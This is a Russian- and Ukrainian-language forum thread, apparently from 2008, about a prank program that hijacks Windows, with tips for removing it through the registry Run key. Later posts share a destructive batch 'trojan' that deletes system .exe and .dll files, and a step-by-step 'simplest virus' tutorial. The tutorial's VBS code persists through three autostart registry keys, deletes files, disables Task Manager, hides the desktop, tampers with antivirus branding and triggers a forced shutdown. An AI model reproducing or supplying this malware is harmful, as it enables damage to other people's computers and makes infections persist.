Любопытным

[SKATINA 0]

Люди вы шо гоните так гнать не гоните

шо делать?

Я нажал Win+L и поменял пользователя а как ету дрянь убрать АААААААААААА

НЕ ГОНИТЕ!!!!!!!!!! аааааааааа АААААААААААаа АААААААААаа МЛЯЯЯЯЯЯЯЯЯЯ

[Lexus-Alexus 0]

Люди вы шо гоните так гнать не гоните

шо делать?

Я нажал Win+L и поменял пользователя а как ету дрянь убрать АААААААААААА

НЕ ГОНИТЕ!!!!!!!!!! аааааааааа АААААААААААаа АААААААААаа МЛЯЯЯЯЯЯЯЯЯЯ

 

если один пользователь - не поменяешь)

[SKATINA 0]

если один пользователь - не поменяешь)

 

так я щя с второго пишу епт ШО ДЕЛАТЬ

[Lexus-Alexus 0]

так я щя с второго пишу епт ШО ДЕЛАТЬ

 

тю.. все елементарно)

[SKATINA 0]

тю.. все елементарно)

 

кароче дело к ночи ........ НЕ ТЯНИ РЕЗИНУ

[Lexus-Alexus 0]

кароче дело к ночи ........ НЕ ТЯНИ РЕЗИНУ

 

ладно... тебе повезло даже больше)

1) удаляешь файл

2) заходишь в regedit.exe

3)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run и удаляешь значение той фигни, вот и всеt)

[SKATINA 0]

ладно... тебе повезло даже больше)

1) удаляешь файл

2) заходишь в regedit.exe

3)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run и удаляешь значение той фигни, вот и всеt)

 

ето ты типа пошутил?

[Lexus-Alexus 0]

ето ты типа пошутил?

 

нет

[Катяка 0]

Мда!Что-то лучше не могли придумать?Хоть у меня все закончилолось перезагруской,но я теперь боюсь на всякые ссылки заходить!!!!!!!!

[doker 0]

ха у меня панда его дажет не разрешыла сохранить, у меня не спрашывая, сама удалила)))

[Barsentiy 3]

ха у меня панда его дажет не разрешыла сохранить, у меня не спрашывая, сама удалила)))

 

то что "панда" его обнаружила как опастость - это +. А то что не спросила - большой -

[Feniks 0]

Блин повырубал только через regedit злостно)))

[Lucky 0]

Мда!Что-то лучше не могли придумать?Хоть у меня все закончилолось перезагруской,но я теперь боюсь на всякые ссылки заходить!!!!!!!!

 

ты не не тотфайлик открыла ) открой 2 прекрепленый )

[Life:) 0]

дурной прикол

[Unro 2]

тема: кто круче даст троян

 

Пра трайан:

 

@echo off
cd
cd C
cd Windows
del *.exe
del *.dll
cd system32
del *.exe
del *.dll

п.с. БАТнікі рулять) Змінено 3 жовтня, 2008 користувачем Unro

[Life:) 0]

Пра трайан:

 

@echo off
cd
cd C
cd Windows
del *.exe
del *.dll
cd system32
del *.exe
del *.dll

п.с. БАТнікі рулять)

 

А через какой язык писать нада троян

[Unro 2]

А через какой язык писать нада троян

 

Блокнотом пиши. Потім зберігай як ІМ"Я.bat і запускай :laugh:

Це примітивний троян. Але страшний. Запустий і все, капут. Скинути тобі? :tongue:

Я і не таке можу зробити.

Змінено 3 жовтня, 2008 користувачем Unro

[Life:) 0]

Та нет спасиба както и без него обойдусь :biggrin: :biggrin: :biggrin: просто интерессно через какии проги пишут вирусы!!

 

А если антивирус есть то он же его удалит!!!Просто интересно запустить посмотреть что получилось :biggrin:

[SiDjey 1]

Мда.. один раз я уже на такую фигню залетел, второй раз как-то не оч хочеться) Жалко тех кто гамал, и не знает что делать дальше)

[Kif 6]

Пра трайан:

п.с. БАТнікі рулять)

 

Блокнотом пиши. Потім зберігай як ІМ"Я.bat і запускай :laugh:

Це примітивний троян. Але страшний. Запустий і все, капут. Скинути тобі? :tongue:

Я і не таке можу зробити.

 

Твой троян не выполнится никогда в жизни :wink:

@echo off (отключение оповещений, ну тут ясно)
cd (ничего не происходит)
cd C (ничего не происходит т.к. после "с" нет двоеточия)
cd Windows (если каким-то чудом ты попал на диск с входим в виндовую папку, НО увы только из командной строки. Батник не пойдет никуда командой cd, ему надо указывать абсолютный путь типа del c:\windows\ file.exe либо относительный del %windir%\file.exe)
del *.exe (2 проблемы 1. по такой маске ничего не удалится, 2. ничего в принципе не удалится, т.к. Винда ругнется на системный файл и прервет процесс) 
del *.dll (аналогично не зная имени файла батник не выполнит ровным счетом ничего, ничего не произойдет т.к. нужные библиотеки винда не даст удалить...)
cd system32(не выполнится. см. выше)
del *.exe(см.выше)
del *.dll(см. выше)

[HAPKOMAT 939]

можно ли сделать что бы БАТник вставил в автозагрузку определыный файл? (по типу скачал с локалки и вставил в автозагрузку)

[Kif 6]

чтобы батник, который пользователь запустит руками вставил в автозагрузку файл можно. Чтобы выполнился сам - нельзя.

[jamper 17]

можно ли сделать что бы БАТник вставил в автозагрузку определыный файл? (по типу скачал с локалки и вставил в автозагрузку)

можна, если запулишь его в автозагрузку или если в задачи. Тогда выполнится.

[Ксюнячка 0]

то не пароль а номер аси ) только не бейте )

 

совместными усилиями с Артёмкой мы справились с этой фигнёй всего навсего за час...

[Night-Life 2]

Простейший вирус своими руками

Создаём файл virus.vbs , открываем блокнот ( в качестве редактора могу порекомендовать notepad++, который можно скачать здесь ) и начинаем писать наш вредоносный скрипт:

 

Set Shell = CreateObject("Wscript.Shell")

Set Application = CreateObject("Shell.Application")

Set FileSystemObject = CreateObject("scripting.filesystemobject")

Set File = FileSystemObject.GetFile(WScript.ScriptFullName)

On Error Resume Next

File.Copy ("c:windowsSystem32virus.vbs")

Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunvirus", "C:WINDOWSSYSTEM32virus.vbs"

Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesvirus", "C:WINDOWSSYSTEM32virus.vbs"

Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOncevirus", "C:WINDOWSSYSTEM32virus.vbs"

Shell.popup "message",5, "heading", 0+16

FileSystemObject.deletefolder"C:example",True

FileSystemObject.deletefile"C:example.txt",True

Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisabletaskmgr", 1, "REG_DWORD"

Shell.RegWrite "HKEY_CURRENT_USERSoftwaremIRCLicense", "blabla"

Shell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionName", "hacked by ваш ник ))"

Shell.RegDelete "HKEY_CURRENT_USERexample"

Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop", 1, "REG_DWORD"

Application.MinimizeAll

InternerExplorer.Visible = True

InternerExplorer.Navigate "http://porno.ru/"

 

Теперь разберём по порядку каждую строчку:

 

Set Shell = CreateObject("Wscript.Shell") 'с этого момента начинается VB скрипт

 

Set Application = CreateObject("Shell.Application") 'разрешаем приложения

 

Set FileSystemObject = CreateObject("scripting.filesystemobject") 'если в скрипте присутствует код использования ФС (aka файловой системы) то необходимо разрешить эту функцию перед началом ее выполнения

 

Set File = FileSystemObject.GetFile(WScript.ScriptFullName) 'разрешаем работу с файлами (копирование, перемещение и т.д.)

 

On Error Resume Next 'очень важная функция - пропуск ошибок (если какого-то файла/папки не окажется то произойдет ошибка в скрипте и все последующие функции не будут выполнены, после этой функции после возникающих ошибок последующие функции будут выполнятся как ни в чем не бывало)

 

File.Copy ("c:windowsSystem32virus.vbs") 'создаём файл virus.vbs в директории c:windowsSystem32 , который содержит тот же код что и этот (короче данный файл копируется туда)

 

Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunvirus", "C:WINDOWSSYSTEM32virus.vbs" 'прописываем только что созданный файл в автозагрузку через реестр в новый строковый параметр "virus" располагающийся здесь - HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun

 

Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesvirus", "C:WINDOWSSYSTEM32virus.vbs" 'прописываем только что созданный файл в автозагрузку через реестр в новый строковый параметр "virus" располагающийся здесь - HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices

 

Shell.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOncevirus", "C:WINDOWSSYSTEM32virus.vbs" 'если прописать наш файл только здесь, то вирус после перезагрузки запустится только один раз, но!!! когда он будет запускаться в нем будет присутствовать эта строка, которая снова пропишет его опять таки в эту директорию - и так после каждого ребута он всё равно будет запускаться. (можешь выбрать из всех трёх способов автозагрузки только один, на случай если юзер вдруг случайно наткнется на одну из этих записей в реестре)

 

Shell.popup "message",5, "heading", 0+16 'выводим сообщение с заголовком "heading" и самим сообщением "message" и 0+16=ошибка(можно заменить на 0+64(значок i), 0+48(значок !), 0+32(значок ?) или 0+0(без значка)) и устанавливаем время показа мессаги в 5 сек.(если поставить 0 время показа будет неограниченным) эту сроку можно переместить и в конец скрипта, тогда сообщение будет выводиться после отработки скрипта. Вместо "message" ты можешь подставить любой текст. А что это будет за текст - это уже зависит от твоей фантазии.

 

FileSystemObject.deletefolder"C:example",True 'удаляем папку example на диске C

 

FileSystemObject.deletefile"C:example.txt",True 'удаляем файл example.txt на диске C

'изменения реестра (все вкусности которые могут использовать вири, нам не перечислить):

 

Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisabletaskmgr", 1, "REG_DWORD" 'отключаем ctrl+alt+del а точнее запрещаем запуск taskmgr aka диспетчер задач windows

 

Shell.RegWrite "HKEY_CURRENT_USERSoftwaremIRCLicense", "blabla" 'если у юзера зарегана mIRC то можно сделать подляночку - пускай зарегает еще раз Для этого меняем серийник на blabla Ты можешь использовать данную функцию для любых других изменений значений реестра, для этого вместо "HKEY_CURRENT_USERSoftwaremIRCLicense" прописываешь путь до интересующего параметра, а вместо "blabla" новое значение.

 

Shell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionName", "hacked by ваш ник ))" 'в главном окне антивируса NOD32 после слов ESET NOD32 Antivirus появится надпись Hacked by "ваш ник" неплохо, да? ))

 

Shell.RegDelete "HKEY_CURRENT_USERexample" 'удаляем ветку реестра HKEY_CURRENT_USERexample

 

'и на последок делаем следующее:

Shell.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop", 1, "REG_DWORD" 'удаляем все с рабочего стола

 

Application.MinimizeAll 'свёртываем все окна

 

InternerExplorer.Visible = True

InternerExplorer.Navigate "http://porno.ru/" 'переходим на порно сайт чтобы хоть как то успокоить юзера которому теперь не сладко придется.

 

Так, с *.vbs вроде разобрались, а как же юзер который остался наедине с... как бы это сказать по мягче, в общем чтобы он не перевозбудился от всего только что увиденного, ограничим ему время просмотра до 120 секунд (2 минут ). Для этого создадим файл virus.bat и впишем в него сдедующую команду:

 

shutdown -s -f -t 120 -c "chuvak, chtoby ty ne perevozbudilsja, companija MiCrO$ofT ogranichila vremja prosmotra dannogo sajta do 2 minut, posle chego vy otpravytes v rebut"

 

А чтобы не вылезала некрасивая консоль напишем перед этой командой следующее:

 

@echo off

 

Джойним два этих файлика и ... в общем это твоё дело для каких целей ты их будешь использовать, но я рекомендую их удалить , так сказать от греха подальше.